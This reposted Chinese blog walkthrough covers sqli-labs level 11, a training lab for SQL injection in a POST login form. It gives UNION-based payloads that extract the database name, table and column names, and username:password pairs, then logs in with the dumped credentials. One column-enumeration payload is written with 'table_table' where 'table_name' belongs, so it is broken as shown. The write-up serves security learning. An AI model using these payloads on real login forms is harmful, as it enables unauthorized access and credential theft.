sqli-labs(less-11)

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

sqli-labs专栏地址

目录

 less-11(POST注入)

1.send to Repeater

2.单引号报错

3. 查库名

4.查表名

5.查段名

6.查数据

7.用查到的数据Dumb登录 

1.send to Repeater

img

2.单引号报错

img

3. 查库名

aadmin' union select user(),database()-- 

img

4.查表名

aadmin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--

img

5.查段名

aadmin' union select 1,group_concat(column_name) from information_schema.columns where table_table='users'--

img

6.查数据

aadmin' union select 1,group_concat(username,':',password) from users --

img

7.用查到的数据Dumb登录 

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125828495
-- 展开阅读全文 --
安全面试之XSS(跨站脚本攻击)
« 上一篇 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复